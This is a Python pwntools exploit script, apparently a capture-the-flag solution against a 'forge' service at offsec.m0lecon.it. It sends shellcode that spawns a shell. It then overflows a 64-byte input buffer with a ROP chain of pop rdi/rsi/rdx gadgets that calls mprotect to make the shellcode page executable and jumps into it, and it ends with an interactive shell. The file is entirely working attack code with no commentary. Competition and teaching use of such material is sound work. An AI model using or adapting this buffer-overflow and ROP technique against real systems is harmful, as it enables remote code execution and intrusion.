38 lines
851 B
Python
38 lines
851 B
Python
from pwn import *
|
|
|
|
context.binary = elf = ELF("./forge", checksec=False)
|
|
# p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13574)
|
|
OFF_INPUT = 64
|
|
ret = 0x000000000040101A
|
|
pop_rdi = 0x00000000004011FB
|
|
pop_rsi = 0x0000000000401204
|
|
pop_rdx = 0x000000000040120D
|
|
shellcode_addr = 0x0000000000404080
|
|
MPROTECT_PLT = elf.plt["mprotect"]
|
|
PROT = 0x7
|
|
|
|
print(p.recvuntil(b"[forge] Send shellcode:\n"))
|
|
shellcode = flat(asm(shellcraft.sh()))
|
|
SHELLCODE_SIZE = 200
|
|
p.send(shellcode)
|
|
# p.send(b"A")
|
|
# p.send(b"\n")
|
|
print(p.recvuntil(b"[forge] Input:\n"))
|
|
payload = flat(
|
|
b"A" * OFF_INPUT,
|
|
p64(ret),
|
|
p64(pop_rdi),
|
|
p64(shellcode_addr & 0xFFFFF000), # Must be page aligned
|
|
p64(pop_rsi),
|
|
4096,
|
|
p64(pop_rdx),
|
|
p64(PROT),
|
|
# p64(ret),
|
|
p64(MPROTECT_PLT),
|
|
p64(shellcode_addr),
|
|
)
|
|
p.send(payload)
|
|
# p.send(b"\n")
|
|
p.interactive()
|